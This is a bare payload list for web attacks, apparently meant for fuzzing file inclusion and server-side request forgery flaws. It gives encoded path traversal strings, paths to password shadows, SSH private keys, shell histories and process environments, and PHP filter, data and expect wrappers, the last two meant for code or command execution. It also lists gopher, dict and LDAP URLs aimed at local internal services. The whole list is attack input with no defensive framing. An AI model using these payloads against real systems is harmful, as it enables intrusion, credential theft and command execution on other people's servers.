../../../etc/passwd
..\/..\/..\/etc/passwd
....//....//....//etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%252f..%252f..%252fetc%252fpasswd
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/issue
/etc/hostname
/proc/version
/proc/cmdline
/proc/self/environ
/proc/self/status
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
C:\Windows\System32\drivers\etc\hosts
C:\Windows\win.ini
C:\Windows\boot.ini
C:\autoexec.bat
C:\config.sys
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/access.log
/var/log/httpd/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/auth.log
/var/log/syslog
/var/log/messages
/var/log/kern.log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/error.log
/var/www/html/index.php
/var/www/html/config.php
/home/user/.ssh/id_rsa
/root/.ssh/id_rsa
/home/user/.ssh/authorized_keys
/root/.ssh/authorized_keys
/home/user/.bash_history
/root/.bash_history
/home/user/.mysql_history
/root/.mysql_history
php://input
php://filter/convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=../../../etc/passwd
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8+
expect://whoami
file:///etc/passwd
gopher://127.0.0.1:80/
dict://127.0.0.1:11211/
ftp://127.0.0.1/
sftp://127.0.0.1/
tftp://127.0.0.1/
ldap://127.0.0.1/